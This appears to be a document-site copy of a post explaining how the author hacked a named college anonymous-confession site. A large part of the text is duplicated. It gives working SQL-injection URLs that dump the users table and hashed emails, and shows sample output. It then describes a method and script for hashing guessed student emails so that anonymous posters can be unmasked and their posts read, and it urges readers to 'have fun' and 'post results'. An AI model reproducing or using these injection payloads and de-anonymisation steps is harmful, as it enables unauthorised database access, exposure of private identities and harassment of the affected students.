Jhu Conf Hacked
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Jhu Conf Hacked as PDF for free.
More details
- Words: 902
- Pages: 3
The whole site is vulnerable to something called SQL-Injection. The following link shows all of the vulnerable fields on a given webpage (using a random thread, you could use any one you wanted though) http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14-As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we want pulled from the SQL-database (the thing that holds user-id's and emails). I'm going to skip a few parts here and get to the nitty-gritty of the matter. The overall database is called "acb" and it has the following tables: tbl_attempts,tbl_crush,tbl_emails,tbl_free_posts,tbl_message_headers,tbl_messages, tbl_moderators,tbl_newpasses,tbl_original_posts,tbl_recentmail,tbl_replies,tbl_rep orts,tbl_schools,tbl_topics,tbl_users,tbl_views,tbl_votes tbl_crush looks potentially embarrassing, as does tbl_messages, but right now we're after tbl_emails tbl_replies tbl_topics and tbl_users. The thing is, when we specify what table we want to check out, instead of writing "tbl_users", we have to write it in Hex. So we get the following url (change the hex code for tbl_users to the hex code for any other table you want): http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_ schema.columns+where+table_name=0x74626C5F7573657273-This table has the following fields: id,email,password,num_bans,ban,school_tag,time,fb_id,activation What does this mean? It means that every email has a specific ID number attached to it (as well as the number of bans said person has received). Let's pull out ID and email, using the following (should be obvious how it was done, if you're playing along at home): http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_usersNow, lets look at the output: 1:2651ff645f9949cd88e65aa0c733a22 2:1351a3c14ae48d5462cc1096ebadb94 3:43acb94e5432110d6604718b8c7f81f 4:c10caae0a314510031f6aaac754f084 5:fcb046a1aa98eb4fe7b98c0f9d6cb4a 6:487a7afeeaa5a00cae8f191abacf1b0 7:cd17ec6c819d64ac575bf3b0531c6c5 8:b72c1c9a78f8ac6eaffa1c129555bb7 9:5b42058073d035b6c6242eaa7876611 10:8c0d386e56576a31d7c64d2123d0952 11:1f5067ee8d726b3549122852d60237d 12:e96a0663305e7053a4a4d6e9bfb1ec3 13:b635dc909f8883090eecda1b2831bd6 14:3ee438b984b69c6f862e45ff7ce0550 15:213cf12185143e9793361bd98396420 16:c7753566d9a7c811e7441624a707b9b 17:fc6aa936d018d93bc86b46a723d728d 18:7b31866f43862f5640139ff1687e968 19:5be6fb314ba1bf898838c4776c060f8 20:204c00ef9a61e7be72f338db07f27cd
21:644b220fb11b108b59f3be286186372 22:6834320ff262f7340b88c83232d77d9 23:a0b4ad04099b001007e800589b98c92 24:84ac74750c3aa18fc9b9dfb481afb20 25:e2c37b7c5f85f7d3822d7f34df07a24 26:059f15d50c08c2481bbf4abeb424d71 27:112dbae75e470ef53cf88ac4226158d 28:ddf59f65913c9c4ddbe788db15d83e5 29:ea2cc6275a3f8b4f982756ebaceef68 We've obviously reached some kind of character limit, so (unfortunately) we have to run the code multiple times using something like this to start our count at the truncated user (user 30 was cut off, in this case): http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+ where+id%3E29-See.. we're asking to get data from tbl_users where id>29. Just run this multiple times over and over and you'll get all the data you need (in about 30 minutes I pulled about 3000 accounts, can share if needed) But look, the email is encrypted. Any good cryptologist can see that this is just the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the designers of the site did something wonderful for us.. "tbl_emails" lists two fields, "email" and "school". If we run the following, we see users emails and the school they are associated with.. http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_em ails-Now we can limit the these emails, we can the encrypted return search parameters to
search to only include school "jhu", and once we have all simply run them through MYSQL's PASSWORD() command and match up with one we pulled from the database, then modify our exclude those emails and continue on ad naseum.
That's not really what most of us want. We want to see who could probably be posting about us, or somebody we know. So instead, it's much easier to encryptthen-match people's JHED emails that you know. Let's say I think Frat Brother #4 posted something bad about my buddy, luckily I know his name and can guess his JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run PASSWORD([email protected]), get an encrypted string, and match it up to the data I pulled so I can see what user-id is attached to it. If there's no hit, I try PASSWORD([email protected]), increasing the number up to some reasonable value before giving up. Once we have an email account's ID number, its all a matter of sorting through tbl_replies or tbl_topics and sorting by user ID to see what this one person has posted. There are many more refined methods of doing this, but this is probably the one people will want to know how to do. It's also possible to just select one field (I like field 5) in a given thread and have it display that person's id number, or anything else if you're so possibly inclined. Play around, get a feel for the database architecture, and you can do some cool stuff. Oh, and a note to people using emails different than their JHED-given ones.. the school's database should allow you to teash out what emails are registered to what JHED-ID (looking at you, [email protected]). Trying to find a way to link them, it shouldn't be that hard. Who would go through all of this trouble? Well, it's not that much of a hassle if
you can write up some scripts to do it for you. Which I did.. a little perl script that goes through the school's directory (pulled an offline copy), gets each person's name and makes a presumed JHED email for them based on their first initial, up to 6 letters of their last name, and gives them a number based on frequency. It also generates a [email protected] address to test too. Then it batch-encrypted them, and matched to ID numbers, and now I've got over 3000 accounts open for business. I won't be sharing these. Suffice to say, somebody knows everything you've posted now. You guys should be nicer to eachother. Total time for the home hacker: 3 hours, give or take. It's a good way to learn how to NOT set up a secure database, too. Total time for YOLO: an hour, if you can stick with it. Then you'll know everything your best friend has been saying about you :) [seriously, watching this is like watching a soap opera, its awesome] Have fun! Post results!
21:644b220fb11b108b59f3be286186372 22:6834320ff262f7340b88c83232d77d9 23:a0b4ad04099b001007e800589b98c92 24:84ac74750c3aa18fc9b9dfb481afb20 25:e2c37b7c5f85f7d3822d7f34df07a24 26:059f15d50c08c2481bbf4abeb424d71 27:112dbae75e470ef53cf88ac4226158d 28:ddf59f65913c9c4ddbe788db15d83e5 29:ea2cc6275a3f8b4f982756ebaceef68 We've obviously reached some kind of character limit, so (unfortunately) we have to run the code multiple times using something like this to start our count at the truncated user (user 30 was cut off, in this case): http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+ where+id%3E29-See.. we're asking to get data from tbl_users where id>29. Just run this multiple times over and over and you'll get all the data you need (in about 30 minutes I pulled about 3000 accounts, can share if needed) But look, the email is encrypted. Any good cryptologist can see that this is just the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the designers of the site did something wonderful for us.. "tbl_emails" lists two fields, "email" and "school". If we run the following, we see users emails and the school they are associated with.. http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SEL ECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_em ails-Now we can limit the these emails, we can the encrypted return search parameters to
search to only include school "jhu", and once we have all simply run them through MYSQL's PASSWORD() command and match up with one we pulled from the database, then modify our exclude those emails and continue on ad naseum.
That's not really what most of us want. We want to see who could probably be posting about us, or somebody we know. So instead, it's much easier to encryptthen-match people's JHED emails that you know. Let's say I think Frat Brother #4 posted something bad about my buddy, luckily I know his name and can guess his JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run PASSWORD([email protected]), get an encrypted string, and match it up to the data I pulled so I can see what user-id is attached to it. If there's no hit, I try PASSWORD([email protected]), increasing the number up to some reasonable value before giving up. Once we have an email account's ID number, its all a matter of sorting through tbl_replies or tbl_topics and sorting by user ID to see what this one person has posted. There are many more refined methods of doing this, but this is probably the one people will want to know how to do. It's also possible to just select one field (I like field 5) in a given thread and have it display that person's id number, or anything else if you're so possibly inclined. Play around, get a feel for the database architecture, and you can do some cool stuff. Oh, and a note to people using emails different than their JHED-given ones.. the school's database should allow you to teash out what emails are registered to what JHED-ID (looking at you, [email protected]). Trying to find a way to link them, it shouldn't be that hard. Who would go through all of this trouble? Well, it's not that much of a hassle if
you can write up some scripts to do it for you. Which I did.. a little perl script that goes through the school's directory (pulled an offline copy), gets each person's name and makes a presumed JHED email for them based on their first initial, up to 6 letters of their last name, and gives them a number based on frequency. It also generates a [email protected] address to test too. Then it batch-encrypted them, and matched to ID numbers, and now I've got over 3000 accounts open for business. I won't be sharing these. Suffice to say, somebody knows everything you've posted now. You guys should be nicer to eachother. Total time for the home hacker: 3 hours, give or take. It's a good way to learn how to NOT set up a secure database, too. Total time for YOLO: an hour, if you can stick with it. Then you'll know everything your best friend has been saying about you :) [seriously, watching this is like watching a soap opera, its awesome] Have fun! Post results!
